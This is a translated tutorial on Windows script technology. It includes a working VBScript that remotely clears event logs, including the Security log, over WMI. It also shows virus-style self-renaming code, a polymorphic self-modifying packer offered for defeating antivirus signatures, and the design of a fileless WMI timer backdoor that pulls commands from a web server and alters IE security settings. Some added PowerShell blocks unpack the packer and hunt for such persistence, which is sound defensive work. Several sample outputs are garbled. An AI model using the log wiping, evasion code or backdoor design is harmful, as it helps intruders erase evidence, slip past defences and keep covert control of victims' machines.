In-depth excavation of Windows script technology

xiaoxiao2021-03-06  74


(The HTML form that the script writes into the IE window with document.write did not survive in this copy. It has text inputs with the ids ip, user and pass (target IP, user name, password), checkboxes with the ids app, sys and sec (the Application, System and Security logs) and two buttons with the ids confirm and cancel. A finished HTML file can also be opened with the Navigate method; the effect is the same. Not only INPUT objects: every object, property and method that DHTML supports can be used. Frame objects are accessed the same way.)

CODZ:

' The IE object is created earlier with WScript.CreateObject("InternetExplorer.Application", "Event_"),
' so its events are delivered to procedures named Event_<EventName>
Dim wmi                                        ' explicitly declare a global variable
Set wnd = ie.document.parentWindow             ' wnd is the window object
Set id = ie.document.all                       ' collection of all objects in the document
id.confirm.onclick = GetRef("Confirm")         ' handler for the OK button
id.cancel.onclick = GetRef("Cancel")           ' handler for the Cancel button
Do While True                                  ' the IE object raises events; the script waits for them in an endless loop
    WScript.Sleep 200
Loop

Sub Event_OnQuit                               ' IE exit event
    WScript.Quit                               ' when IE exits, the script exits too
End Sub

Sub Cancel                                     ' Cancel button event
    ie.Quit                                    ' closing IE raises Event_OnQuit, so the script exits as well
End Sub

Sub Confirm                                    ' OK button event; this is the key part
    With id
        If .ip.value = "" Then .ip.value = "."  ' an empty target means the local machine
        If Not (.app.checked Or .sys.checked Or .sec.checked) Then  ' app etc. are checkboxes; .checked tells whether they are ticked
            wnd.alert("Select at least one log")
            Exit Sub
        End If
        Set lct = CreateObject("WbemScripting.SWbemLocator")       ' server locator object
        On Error Resume Next                                       ' let the script host ignore the error if the connection fails
        Set wmi = lct.ConnectServer(.ip.value, "root\cimv2", .user.value, .pass.value)  ' connect to the root\cimv2 namespace
        If Err.Number Then                                         ' catch and handle the error
            wnd.alert("Connect WMI server failure")                ' here we simply report the failure
            Err.Clear
            On Error GoTo 0
            Exit Sub
        End If
        On Error GoTo 0                                            ' back to normal error handling
        If .app.checked Then ClearLog "Application"                ' clear each selected log
        If .sys.checked Then ClearLog "System"
        If .sec.checked Then ClearLog "Security"
    End With
    ie.Quit
    WScript.Quit
End Sub

Sub ClearLog(name)
    ' Win32_NTEventLogFile is queried by log name; the instance is the log's file object
    Set logs = wmi.ExecQuery("select * from Win32_NTEventLogFile where LogFileName='" & name & "'")
    For Each l In logs
        If l.ClearEventLog() Then wnd.alert("Clear log " & name & " error!")   ' ClearEventLog returns 0 on success
    Next
End Sub

To sum up the whole process: first create an InternetExplorer.Application object. Its direct effect is to start an iexplore.exe process, but the window stays invisible until ie.Visible = 1 is set. Then write the HTML into the IE window with document.write; for a complex interface, save the HTML as a file and open it with ie.Navigate(filename). Finally, respond to the input made in the window; this is essentially DHTML territory. The biggest difference from ordinary script programming is that IE is event-driven: what you have to do is set up the corresponding event handlers.

In this example the script only cares about three events: IE exits, the OK button is clicked, the Cancel button is clicked. Note that only two statements in the example set an event handler, and no IE exit event is explicitly associated with the Event_OnQuit procedure. This uses a feature of WScript.CreateObject: its second parameter, "Event_", is a prefix, and the IE object's events are handled by the procedure whose name is that prefix plus the event name. So the OnQuit event is handled by Event_OnQuit. When the OK button is clicked, the Confirm procedure is called. The example shows how to access objects inside IE: ie.document.all.ip.value is the text typed into the Target IP box; if the Application checkbox is ticked, ie.document.all.app.checked is True, otherwise False. To call the alert method, use ie.document.parentWindow.alert. Other IE objects are accessed in exactly the same way; see the DHTML documentation for details. With a web interface, interaction becomes rich and colourful and everyone can give full play to their creativity. For example, many GUI tools (such as Streamer) show a logo page with copyright information when they start. We can imitate one:

CODZ:

Set ie = WScript.CreateObject("InternetExplorer.Application")
ie.FullScreen = 1                       ' no title bar, menu or border
ie.Width = 300
ie.Height = 150
ie.Navigate "about" & ":blank"
ie.Left = Fix((ie.document.parentWindow.screen.availWidth - ie.Width) / 2)    ' center the window on the screen
ie.Top = Fix((ie.document.parentWindow.screen.availHeight - ie.Height) / 2)
ie.document.write _
    "this is a Logo"                    ' the markup that gave the blue background was lost in this copy
ie.Visible = 1
WScript.Sleep 5000
ie.Quit

After the code above runs, a borderless IE window appears in the center of the screen for 5 seconds.

The window shows black text on a blue background. That is the logo.

Once a script has a GUI, interaction with the user becomes more intuitive. For tools with many parameters, such as nmap, writing a graphical "interface" in script for local use is worthwhile. The tool's output can also be post-processed by script and displayed, for example by generating an HTML scan report the way tools such as Streamer do.

[Anti-check]

First of all, I have not tried to challenge the detection capabilities of anti-virus software. Windows script is an interpreted language and is saved as clear-text code. Since there is no compilation step, the complexity of the code is far below that of an executable (EXE), so there is no reason to expect much from scripts in that respect. However, precisely because scripts are so easy to inspect, the detection methods anti-virus software applies to them are not advanced, which gives us room to work with.

Let's take a look at the common anti-check method:

1, split / reorganization of strings or statements.

The most typical example is turning Set fso = CreateObject("Scripting.FileSystemObject") into Set fso = CreateObject("Script" & "ing.FileSystem" & "Object").

An extension of this approach is the Execute statement:

Execute("Set fso = Crea" & "teObject(""Scr" & "ipting.FileSy" & "stemObject"")")

2, the variable name automatically changes.

CODZ:

Randomize
Set of = CreateObject("Scripting.FileSystemObject")
vc = of.OpenTextFile(WScript.ScriptFullName, 1).ReadAll        ' read this script's own source
fs = Array("of", "vc", "fs", "fsc")                             ' the variable names to rename
For fsc = 0 To 3
    ' replace each name with four random letters
    vc = Replace(vc, fs(fsc), Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65) & Chr(Int(Rnd * 22) + 65))
Next
of.OpenTextFile(WScript.ScriptFullName, 2, 1).WriteLine vc      ' overwrite the script with the renamed version

The code above is taken from the Love Letter virus. Run it and you will see what happens.

3. Use the official tool, the Script Encoder screnc.exe [5], to encode the script.

The encoded script can be run directly by the script host. This would be the best solution, except that "the gun and the bird" cancel each other out: the encoding is reversible and every anti-virus product can decode it, so the effect of this approach is basically zero.

The first method effectively tells us this fact: detection of script viruses is basically static. I even found that changing nothing but the case of the code can evade detection (at least with one anti-virus product). The key to evading detection is to break the signature.

For evading EXE detection, the first thing that comes to mind is "packing". The same approach can be applied to scripts. For example:

CODZ:

Str = "cSWpire.tohcO"" ""!K"
For i = 1 To Len(Str) Step 3
    Rev = Rev & StrReverse(Mid(Str, i, 3))     ' undo the reversal of each 3-character chunk
Next
Execute Rev

A simplest "packer". Its algorithm is to reverse every n characters; n is the "seed" of the algorithm, in this example 3.

This "packer" is static and does not weaken the signature at all. On the contrary, it adds one, such as "cSWpire".

Look at a complex example:

CODZ:

Str = "WScript.echo ""OK!"": Randomize: key = Int(Rnd * 8 + 2): str = Rev: str = Replace(str, Chr(34), Chr(34) & Chr(34)): Set aso = CreateObject(""ADODB.Stream""): With aso: .Open: .WriteText ""Str = "" & Chr(34) & str & Chr(34) & "": key = "" & CStr(key) & "": str = Rev: Execute str: Function Rev(): For i = 1 To Len(str) Step key: Rev = Rev & StrReverse(Mid(str, i, key)): Next: End Function"": .SaveToFile WScript.ScriptFullName, 2: End With": key = 1: str = Rev: Execute str: Function Rev(): For i = 1 To Len(str) Step key: Rev = Rev & StrReverse(Mid(str, i, key)): Next: End Function

(Note that this code is a single line with no line breaks: the packed payload must fit inside one string literal.)

Save it as a .vbs file and double-click it. The effect is the same as for the previous code: a dialog box pops up showing "OK!".

But if you look at the code afterwards, it may have become this:

CODZ:

Str = "tpircsw" "Ohce.ar:"" !koezimodnni=yek:8*dnr (TRTS :)2 ts:ver=alper=r ,rts (EC) 43 (RHC43 (RHC, 3 (RHc )" )) 4RC = OSA JBOETAEDA "" (Tcerts.bdow :) "" Maeosa HTI: nepo.: Tetirw.ts "" TXERHC "= RTS ) 43 (3 (RHC Rek:" ) 4TSC "= Y ) Yek (rr = rts: "" CEXE: VERTS ETUITCNUF: (Ver Noi ROF:) L OT 1 =) RTS (nek pets = Ver: Yerts VERESREVERTS (DIM (Yek, I, RTXEN :)) UF DNE: " "NOITCNTEVAS. :W Elifo.tpircsftPircSemanllu DNE: 2, HTIW": key = 7: str = Rev: Execute str: function rev (): for i = 1 to LEN (STR) Step key: Rev = Rev strreverse (MID (STR, I, KEY): Next: End Function

Run it again and it turns into something else. The script deforms itself.

If you look at the code carefully, you will find that the "packer" algorithm is unchanged while the "seed" changes randomly. So although the packed content differs every time, the "packer" itself never changes. Many EXE packers are treated as malicious by anti-virus software, which extracts a signature from the packer code, and the same can happen to a script packer. To evade detection better, the script's "packer" also has to change dynamically, which is the so-called polymorphism. Note that EXE polymorphism exists to defeat emulation, whereas the script's "polymorphism" only has to defeat signature matching; the two are very different. For EXEs I have never heard of true polymorphism; for scripts it is more or less achievable.
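The observation that the "packer" is static can be turned around: the seed is written into the generated file in clear, so a decoder needs no emulation at all. The Windows PowerShell below is an added example, not code from the article. It implements the same chunk reversal as the Rev function (the operation is its own inverse), builds a packed one-liner of the article's shape from a payload and a key, and recovers the payload from such a one-liner by reading the key and undoing the quote doubling. The sample at the end is constructed here from the article's payload WScript.echo "OK!" with key 3; the function names are this example's own.

```powershell
# Added example, not from the article. Works on the layout the article's
# self-modifying one-liner produces:
#   Str = "<chunk-reversed payload, quotes doubled>": key = N: str = Rev: Execute str: ...
function Invoke-ChunkReverse {
    # Same operation as the article's Rev(): reverse each run of $Key characters.
    # Reversing the same chunks twice restores the input, so this both packs and unpacks.
    param([string]$Text, [int]$Key)
    if ($Key -lt 1) { throw "key must be >= 1" }
    $out = New-Object System.Text.StringBuilder
    for ($i = 0; $i -lt $Text.Length; $i += $Key) {
        $len = [Math]::Min($Key, $Text.Length - $i)        # the last chunk may be shorter, as with Mid()
        $chunk = $Text.Substring($i, $len).ToCharArray()
        [Array]::Reverse($chunk)
        [void]$out.Append((-join $chunk))
    }
    $out.ToString()
}

function ConvertTo-ShelledScript {
    # Build the one-liner the article's generator writes (without the self-rewriting part).
    param([string]$Payload, [int]$Key)
    $packed = (Invoke-ChunkReverse -Text $Payload -Key $Key) -replace '"', '""'   # VBScript quote doubling
    'Str = "{0}": key = {1}: str = Rev: Execute str: Function Rev(): For i = 1 To Len(str) Step key: Rev = Rev & StrReverse(Mid(str, i, key)): Next: End Function' -f $packed, $Key
}

function Get-ShellPayload {
    # Static unpacking: the first string literal is the packed payload, the seed follows as "key = N".
    param([string]$Script)
    $m = [regex]::Match($Script, '^\s*\w+\s*=\s*"((?:[^"]|"")*)"\s*:\s*key\s*=\s*(\d+)', 'IgnoreCase')
    if (-not $m.Success) { throw "not the expected packed layout" }
    $packed = $m.Groups[1].Value -replace '""', '"'    # undo the quote doubling first, then the reversal
    Invoke-ChunkReverse -Text $packed -Key ([int]$m.Groups[2].Value)
}

# Constructed sample: the article's payload packed with key 3, then unpacked again.
$sample = ConvertTo-ShelledScript -Payload 'WScript.echo "OK!"' -Key 3
$sample
Get-ShellPayload -Script $sample
```

Get-ShellPayload also accepts the first generation of the article's one-liner (key = 1), because the regex treats every doubled quote inside the literal as an escaped quote and stops only at the single quote that precedes ": key". The later "polymorphic" variant, which splits the Execute string into pieces joined with & or +, needs those pieces concatenated first; the chunk reversal itself is unchanged.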

Besides the three methods above, modifications that do not affect function include:

1. randomly changing the case of letters;

2. randomly swapping the colon (:) and the line break (except for the colon that follows a string literal or Then);

3. randomly swapping + and & when joining split strings;

4. randomly inserting spaces, or a line continuation (_) followed by a line break, around characters such as ( ) + - * / &;

5. replacing built-in functions with custom functions; even if the custom function merely wraps the built-in one, at least the keyword changes.

..........

Other "polymorphic" tricks remain to be discovered.

Applying these tricks greatly increases code length. To write a reasonably complete "packer", I believe some "syntax analysis" is needed, because the script has to "read" itself, achieving an effect similar to a Java obfuscator. That is very complicated and may be discussed another time. Below we apply "statement splitting", "automatic variable renaming", "random case" and "+ / & interchange" and look at the effect:

CODZ:

A001 = "WScript.echo ""OK!"": A004 = Chr(34): Randomize: A005 = Int(Rnd * 24000 + 40960): A001 = A006(A001): A000 = A005 Mod 10 + 2: A001 = Replace(A002, A004, A004 & A004): Set A007 = CreateObject(""ADODB.Stream""): A007.Open: A007.WriteText Hex(A005 + 1) & ""="" & A004 & A001 & A004 & A008("": Execute "" & A004 & A006(""A000="" & A000 & "": A001 = A002: Execute A001: Function A002(): For A003 = 1 To Len(A001) Step A000: A002 = A002 & StrReverse(Mid(A001, A003, A000)): Next: End Function"") & A004): A007.SaveToFile WScript.ScriptFullName, 2: Function A006(A009): For A00A = 0 To 12: A009 = Replace(A009, Hex(&HA000 + A00A), Hex(A005 + A00A)): Next: A006 = A009: End Function: Function A008(A009): For A00A = 1 To Len(A009): A00B = Mid(A009, A00A, 1): If Int(Rnd * 2 - 1) Then A00B = UCase(A00B): End If: If A00A > 11 And Int(Rnd * 5) = 0 Then A008 = A008 & A004 & Chr(38 + Int(Rnd * 2) * 5) & A004: End If: A008 = A008 & A00B: Next: End Function": A000 = 1: A001 = A002: Execute A001: Function A002(): For A003 = 1 To Len(A001) Step A000: A002 = A002 & StrReverse(Mid(A001, A003, A000)): Next: End Function

(Note: again there is no line break anywhere. A006 renames the variables A000..A00C to consecutive hexadecimal names starting at a random base, A002 is the chunk-reversal "packer" with seed A000, and A008 randomizes the case of the tail and splits it into string pieces joined with & or +.)

The above is the "original". Save it as a .vbs file and double-click it; the dialog showing "OK!" still pops up. The code then looks like this (the result is random):

CODZ:

B906 = "TPIRCSW" "OHCE.9B:" "! KO (RHC = 90nar:) 43: EzimodNi = A09B2 * DNR (T04 00049B:) 069B09B = 60:) 609B (9B = 509b DOM A09B: 2 01Lper = 6009B (ECA, 909B, 79B & 909Btes:) 90c = c09b Boetaera "" (Tcejts.bdod :) "" MaerPo.c09bc09b: NetTirw.xeh TXE1 A09B (B & "" = "" &) 09B & 909 & 909B & 6: "" (D09betucexe909B & "" "" (B09b && "= 509b:" "& 509b9b = 609bcexe: 709b etcnuf: 609b NOITOF:) (70 = 809b Rel OT 1) 609B (NB PETS 09B: 509 709B = 7everrtsdim (ESRB, 609B (09B, 809XEN) ) 5f DNE: TnOitcnu909b &) "" "" "" "Fotevascsw Elics.tpirluftPir2, Emanlitcnuf: B09B NO:) E09B (09b ROF OT 0 = Fe09B: 21Calper =, E09B (EBH & (XEH09B 509 (XEH,) F9B A09BEN :)) F0B09B: TXE: E09B = CNUF DNUF: NOIT NOITCN9B (D09Brof:) E01 = F09B Nel OT:) E09B (IM = 019b, E09B (D) 1, F09BTNI FI: -2 * DNR (NEHT) 1U = 019b 9b (esacdne:) 01 FI: FI 11> F09BNI DNA 5 * DNR (TEHT 0 =) = D09B N9B & D09B (RHC & 90 (TNI 83 *) 2 * DNR909B &) 5FI DNE: B = D09B: 19B & D09: TXEN: 0NUF DNENOITC " : Execute "B9" & "05 = 7" & ": b906" & "= b907: e" "xec" "ute b906" ": fun" & "ction b9" & "07 (): for" "B9" "08 = 1 to L" & "en (b906)" "Step B905: B907" & "= B907 " Strreverse ("&" B9 "&" 0 "&" 6, B908, B905 "&") " "): N " " EX " " T " ": End Fun "&" CTION "

Unreadable? Once more:

CODZ:

F0CB = "rcsw.tpiohceko" "f:" "! = EC0 (RHC:) 43DNARZIMO0F: EI = FCR (TN2 * DN0004904 :) 06bc0fd0f = 0f (0:) bcac0fc0f = om F01 DF: 2 = Bc0Lper (ECACC0FC0F, 0F, EF & EC) EC0tes: D0F RC = 1Taeejbo "" (Tcdodats.bmaerf :) "" "" "" "" "" "" "=" "=" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" " (0 = AC00F & "" "" "CCUCEX ETBC0FNUF: OITC0F N) (Ccrof: C0F 1 = DL OTF (NE) BC0ETS 0F PF: AC = CC0CC0FRTS EVER (ESR (DIMBC0FC0F, 0F, D)) Acxen: Ne: tuf ditcn "" NOC0F & f:) E.1D0EVASIFTW ELIRCSS.TPPIRCLUFTW ELIRCSS.TPPIRCLUFTMANL: 2, ECNUFNOITD0F 0F (0:) 3D ROF4D0FT 0 = 21 OD0F: ER = 3Calp0f (EH, 3D & (XEC0FH0F A,) 4D (XEHFC0FD0F :)) 4TXEND0F: 0F = 0e: 3DF DNTCNU: Noichufnoitd0f 0f (2:) 3D ROF4D0FT 1 = EL O0F (N:) 3D5D0FDIM = D0F (0F, 31, 4DFI:) TNI DNR (1-2 * HT) f NE = 5d0 SACU0F (E:) 5D DNEI: FI0F F1> 4DNA 1Ni DNR (T) 5 * DT 0 = Neh2D0FD0F = 0F & 2C & EC3 (RHNI 8nR (T) 2 * D &) 5 * Ec0fdne :: Fi 2D0FD0F = 0F & 2N: 5D: TXE DNECNUFNOIT ": Execute" f " " 0ca "&" = 4: f0cb " " = " " f0cc: EX " " "CUTE F0CB" & ": f" "UNC" "Tion F0cc (): F " " OR " " F0 "&" CD = 1 to Len (F0CB) Step F0CA: F0CC = F0CC STRR " " Ever " " SE "&" (MID (" " F0CB, " " F0CD, F0CA): N

Is this enough? I don't know. Perhaps the anti-virus engine ignores case and automatically joins split strings.

Is this "packer" practical? No, because its algorithm is too simple. The "seed" is A000 = A005 Mod 10 + 2, so if automatic variable renaming is left aside there are only 10 possible packed forms. How to improve this "packer"? With more complex algorithms and more "polymorphism", of course.

If you are interested, read the "original" script (replace the colons with line breaks for better readability) and then strengthen it.

Of course, you can also start from scratch and show your own creativity.

[To do a back door]

Before discussing the script backdoor, a very useful WMI feature has to be introduced. It is in fact the key to this section; the script backdoor is just one application of it.

As mentioned earlier, WMI is event-driven. The whole event handling mechanism is divided into four parts:

1. Event providers: responsible for generating events. WMI contains many of them: specific event providers such as the performance counters, and generic event providers that cover instance creation, modification, deletion and other general events.

2. Event filters: the system generates a large number of events all the time; a script captures the events it is interested in by defining a filter.

3. Event consumers: responsible for handling events. A consumer can be an executable program, a dynamic link library (DLL, loaded by WMI) or a script.

4. Event binding: by binding a filter to a consumer, it is made clear which consumer is responsible for handling which events.

Event consumers are either temporary or permanent. A temporary consumer only cares about specific events while it is running. A permanent consumer is registered as a class instance in a WMI namespace and stays in effect until it is unregistered. Obviously, permanent event consumers are more practical. Let's look at an example:

CODZ:

nslink = "winmgmts:\\.\root\cimv2:"                     ' only used locally, so this moniker syntax is enough and no SWbemLocator object is needed
Set asec = GetObject(nslink & "ActiveScriptEventConsumer").SpawnInstance_   ' create an "active script event consumer"
asec.Name = "stopped_spooler_restart_consumer"          ' name of the consumer
asec.ScriptingEngine = "vbscript"                       ' scripting language (only vbscript)
asec.ScriptText = "getobject(""winmgmts:win32_service='spooler'"").startservice"   ' the script code
Set asecpath = asec.Put_                                ' register the consumer; Put_ returns its path
Set evtflt = GetObject(nslink & "__EventFilter").SpawnInstance_   ' create an event filter
evtflt.Name = "stopped_spooler_filter"                  ' name of the filter
qstr = "select * from __InstanceModificationEvent within 5"        ' poll for "instance modification events" every 5 seconds
qstr = qstr & " where TargetInstance isa ""Win32_Service"""        ' the class of the target instance is Win32_Service
qstr = qstr & " and TargetInstance.Name = ""Spooler"""             ' the instance name is Spooler
qstr = qstr & " and TargetInstance.State = ""Stopped"""            ' the State property is Stopped
evtflt.Query = qstr                                     ' the query
evtflt.QueryLanguage = "wql"                            ' the query language (only wql)
Set fltpath = evtflt.Put_                               ' register the filter; Put_ returns its path
Set fcbnd = GetObject(nslink & "__FilterToConsumerBinding").SpawnInstance_   ' create the binding between filter and consumer
fcbnd.Consumer = asecpath.Path                          ' specify the consumer
fcbnd.Filter = fltpath.Path                             ' specify the filter
fcbnd.Put_                                              ' register the binding
WScript.Echo "Installed"

What this script does: when the state of the Spooler service changes to Stopped, the consumer handles the event by restarting Spooler.

First run net start spooler, then net stop spooler. Within at most 5 seconds, Spooler starts again.

Running the script as it stands produces an error, because ActiveScriptEventConsumer (ASEC) is not installed in the root\cimv2 namespace by default.

Open %windir%\system32\wbem\scrcons.mof in Notepad and delete the first line, #pragma namespace("\\\\.\\root\\default"), or change it to #pragma namespace("\\\\.\\root\\cimv2"). On XP/2003 this line does not exist, so nothing needs to be changed.

Then do this below:

C:\WINNT\system32\wbem> mofcomp.exe -N:root\cimv2 scrcons.mof

Microsoft (R) 32-bit MOF Compiler Version 1.50.1085.0007

Copyright (c) Microsoft Corp. 1997-1999. All rights reserved.

Parsing MOF file: scrcons.mof

MOF file has been successfully parsed

Storing data in the repository...

Done!

This installs ASEC into root\cimv2. Both mofcomp.exe and scrcons.mof ship with the system.

On Windows 2000 ASEC is installed by default into the root\default namespace, and on XP/2003 into root\subscription. However, on 2000 an event filter cannot capture events from another namespace (XP/2003 can), a binding cannot cross namespaces, and most events are generated in root\cimv2, so ASEC has to be reinstalled into the namespace of the event source. The following script performs the ASEC reinstallation automatically.

CODZ:

Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
path = shl.ExpandEnvironmentStrings("%windir%\system32\wbem")
Set mof = fso.OpenTextFile(path & "\scrcons.mof", 1, False, -1)   ' the MOF file is in Unicode format
mofs = mof.ReadAll
mof.Close
mofs = Replace(mofs, "\\default", "\\cimv2", 1, 1)                ' replace the default namespace (first occurrence only)
mofp = path & "\spacecimv2.mof"
Set mof = fso.CreateTextFile(mofp, False, True)                    ' create a temporary MOF file, also Unicode
mof.Write mofs
mof.Close
shl.Run path & "\mofcomp.exe -N:root\cimv2 " & mofp, 0, True       ' install into root\cimv2 and wait for mofcomp to finish
fso.DeleteFile mofp
WScript.Echo "Installed"

Unregistering the permanent event subscription:

CODZ:

nslink = "winmgmts:\\.\root\cimv2:"
myconsumer = "stopped_spooler_restart_consumer"     ' name of the consumer
myfilter = "stopped_spooler_filter"                 ' name of the filter
Set binds = GetObject(nslink & "__FilterToConsumerBinding").Instances_
For Each bind In binds
    ' the Consumer and Filter properties are object paths that end with the instance name in quotes
    If StrComp(Right(bind.Consumer, Len(myconsumer) + 1), myconsumer & Chr(34), 1) = 0 _
       And StrComp(Right(bind.Filter, Len(myfilter) + 1), myfilter & Chr(34), 1) = 0 Then
        GetObject("winmgmts:" & bind.Consumer).Delete_   ' delete the consumer
        GetObject("winmgmts:" & bind.Filter).Delete_     ' delete the filter
        bind.Delete_                                     ' delete the binding
        Exit For
    End If
Next
WScript.Echo "Uninstalled"

Besides ASEC, WMI provides other permanent event consumers, such as SMTPEventConsumer, which can automatically send mail to the administrator's mailbox when something abnormal happens on the system. The WMI Event Registration tool in WMI Tools creates, modifies and deletes instances of permanent event consumers, event filters and timer event sources in a given namespace, and binds or unbinds them.

The parts of the event handling mechanism are described in detail in the "WMI Technical Guide" and, of course, more comprehensively in MSDN, so I will not repeat them. (Take a look, drink some water, have a rest ^_^)
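The same Spooler-restart subscription, installed and removed with Windows PowerShell. This is an added example and not part of the article. It assumes XP/2003 or later, where ActiveScriptEventConsumer is registered in root\subscription and an __EventFilter carries an EventNamespace property that selects the namespace to watch, so the scrcons.mof re-install described above is not needed; the function names and the "stopped_spooler" prefix are this example's own. Run it from an elevated prompt.

```powershell
# Added example, not from the article: install and remove the Spooler-restart
# subscription with Windows PowerShell (Set-WmiInstance / Get-WmiObject).
$ns   = 'root\subscription'
$name = 'stopped_spooler'                     # prefix for the three objects, this example's own choice

function Install-SpoolerRestart {
    # 1. filter: poll Win32_Service every 5 s and fire when Spooler reaches Stopped
    $filter = Set-WmiInstance -Namespace $ns -Class __EventFilter -Arguments @{
        Name           = "${name}_filter"
        EventNamespace = 'root\cimv2'         # the events come from root\cimv2; the subscription lives in root\subscription
        QueryLanguage  = 'WQL'
        Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 5 " +
                         "WHERE TargetInstance ISA 'Win32_Service' " +
                         "AND TargetInstance.Name = 'Spooler' AND TargetInstance.State = 'Stopped'"
    }
    # 2. consumer: the VBScript that scrcons.exe will run; it exists only in the CIM repository
    $consumer = Set-WmiInstance -Namespace $ns -Class ActiveScriptEventConsumer -Arguments @{
        Name            = "${name}_restart_consumer"
        ScriptingEngine = 'VBScript'
        ScriptText      = 'GetObject("winmgmts:Win32_Service.Name=''Spooler''").StartService'
    }
    # 3. binding: tie the filter to the consumer
    Set-WmiInstance -Namespace $ns -Class __FilterToConsumerBinding -Arguments @{
        Filter   = $filter
        Consumer = $consumer
    }
}

function Uninstall-SpoolerRestart {
    # Remove the binding first so nothing references the filter or consumer while they are deleted.
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -match "${name}_filter" } |
        Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='${name}_filter'" |
        Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -Filter "Name='${name}_restart_consumer'" |
        Remove-WmiObject
}

Install-SpoolerRestart
# Test it the way the article does: Stop-Service Spooler, wait up to 5 s, then Get-Service Spooler.
# When finished: Uninstall-SpoolerRestart
```

Set-WmiInstance returns the created instance, and passing those instances as the Filter and Consumer values of the binding lets WMI fill in the reference paths, which is what the VBScript does by hand with asecpath.Path and fltpath.Path.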

Now to the script backdoor.

WMI provides two timers, __AbsoluteTimerInstruction and __IntervalTimerInstruction, which generate events at a specified time or at a specified interval. Register a filter that captures the timer events, bind it to ASEC, and we have a rare way of starting a program. Moreover, the script code is hidden entirely inside the CIM repository and does not exist as a separate file, which makes it harder to detect. These are the advantages of the script backdoor. The difficulties are:

1. When the script runs, the system's own scrcons.exe acts as the script host (the Windows designers were not so foolish as to use the WMI service itself as the host). That adds a process; although it is a legitimate process that anti-virus software ignores, it is too conspicuous. So the script must not keep running in the background; it should start on each timer event and finish as quickly as possible. After the script ends, the scrcons.exe process does not exit by itself, so the script has to terminate its own host process through the Win32_Process object provided by WMI (burning the beanstalk to cook the beans!).

2. Scripts have very poor networking, relying basically on objects such as Microsoft.XMLHTTP. So the script backdoor can neither listen on a port nor provide a cmd shell; it can only connect to a web server to fetch control commands. A viable approach is to place a command file on a web server; the backdoor locates the server by domain name, downloads the command file and acts on its content. This requires a web server, or a temporary one built with a tool such as NetBox. Of course the server does not have to be online all the time, only when you want to control the backdoor.

3. Since the script backdoor runs intermittently, the same command must not be executed again and again. The solution is to record the length of the command in the registry and compare the length of each newly fetched command with the record: if they are equal, skip it; if they differ, overwrite the record and execute the command.

4. To get through the firewall by way of the IE object, the XMLHTTP object has to be created inside IE, where it is subject to the security level of the Internet zone. Even if the code were saved in an HTML file and opened with IE it would only be in the "My Computer" zone, and creating an ActiveX object not marked as safe would pop up a warning dialog. The solution is to modify the registry and temporarily change the security settings.

5. The WScript object is provided by wscript.exe and cscript.exe, not by scrcons.exe, so many common functions such as WScript.Sleep are unavailable. Without Sleep, XMLHTTP cannot be used asynchronously, and synchronous XMLHTTP may block for a long time, which is a serious drawback. Calling the ping command to delay spawns a new process, and the Popup method of WScript.Shell with a timeout makes a "ding". Fortunately Microsoft.XMLHTTP has "relatives" such as MSXML2.XMLHTTP, MSXML2.ServerXMLHTTP, MSXML2.DOMDocument and WinHttp.WinHttpRequest. The last one can set timeouts, which is just what we need.
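For the defender, the five points above also describe what the backdoor looks like: a timer event source, an ActiveScriptEventConsumer whose ScriptText exists only in the CIM repository, a binding, and a scrcons.exe host process. The Windows PowerShell below is an added example, not code from the article, that collects exactly those objects from the namespaces the article mentions. The keyword heuristic it applies to ScriptText is this example's own and merely mirrors the objects the core code below relies on (IE, XMLHTTP/WinHttp, Win32_Process, RegWrite); it is not a signature.

```powershell
# Added example, not from the article: hunt for a timer-driven script subscription.
# Needs Windows PowerShell (Get-WmiObject) and an elevated prompt.
function Find-WmiScriptPersistence {
    # root\cimv2 for a 2000-style ASEC re-install, root\subscription for XP/2003 and later, root\default for 2000
    $namespaces = 'root\subscription', 'root\cimv2', 'root\default'
    foreach ($ns in $namespaces) {
        # 1. timer event sources: the unusual start method the article relies on
        Get-WmiObject -Namespace $ns -Class __TimerInstruction -ErrorAction SilentlyContinue |
            ForEach-Object {
                $when = if ($_.__CLASS -eq '__IntervalTimerInstruction') {
                    "every $($_.IntervalBetweenEvents) ms"
                } else {
                    "at $($_.EventDateTime)"
                }
                [pscustomobject]@{ Namespace = $ns; Kind = 'timer'; Name = $_.TimerId; Detail = "$($_.__CLASS) $when" }
            }
        # 2. script consumers: dump the script text, which otherwise lives only in the repository
        Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -ErrorAction SilentlyContinue |
            ForEach-Object {
                $code = if ($_.ScriptText) { $_.ScriptText } else { "file: $($_.ScriptFileName)" }
                # constructed heuristic: the building blocks the article's backdoor uses
                $flag = if ($code -match 'xmlhttp|winhttp|InternetExplorer\.Application|Win32_Process|RegWrite') { ' [SUSPICIOUS]' } else { '' }
                [pscustomobject]@{ Namespace = $ns; Kind = 'consumer'; Name = "$($_.Name)$flag"; Detail = $code }
            }
        # 3. bindings: which filter (possibly a __TimerEvent query) drives which consumer
        Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{ Namespace = $ns; Kind = 'binding'; Name = $_.Filter; Detail = $_.Consumer }
            }
    }
    # 4. the host process the article calls "too conspicuous"
    Get-Process -Name scrcons -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{ Namespace = ''; Kind = 'process'; Name = "scrcons.exe pid $($_.Id)"; Detail = "started $($_.StartTime)" }
    }
}

Find-WmiScriptPersistence | Format-Table -AutoSize -Wrap
```

Querying the abstract __TimerInstruction class returns both __IntervalTimerInstruction and __AbsoluteTimerInstruction instances, and -ErrorAction SilentlyContinue covers namespaces where ActiveScriptEventConsumer was never installed (root\cimv2 on a machine that did not get the re-install described above).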

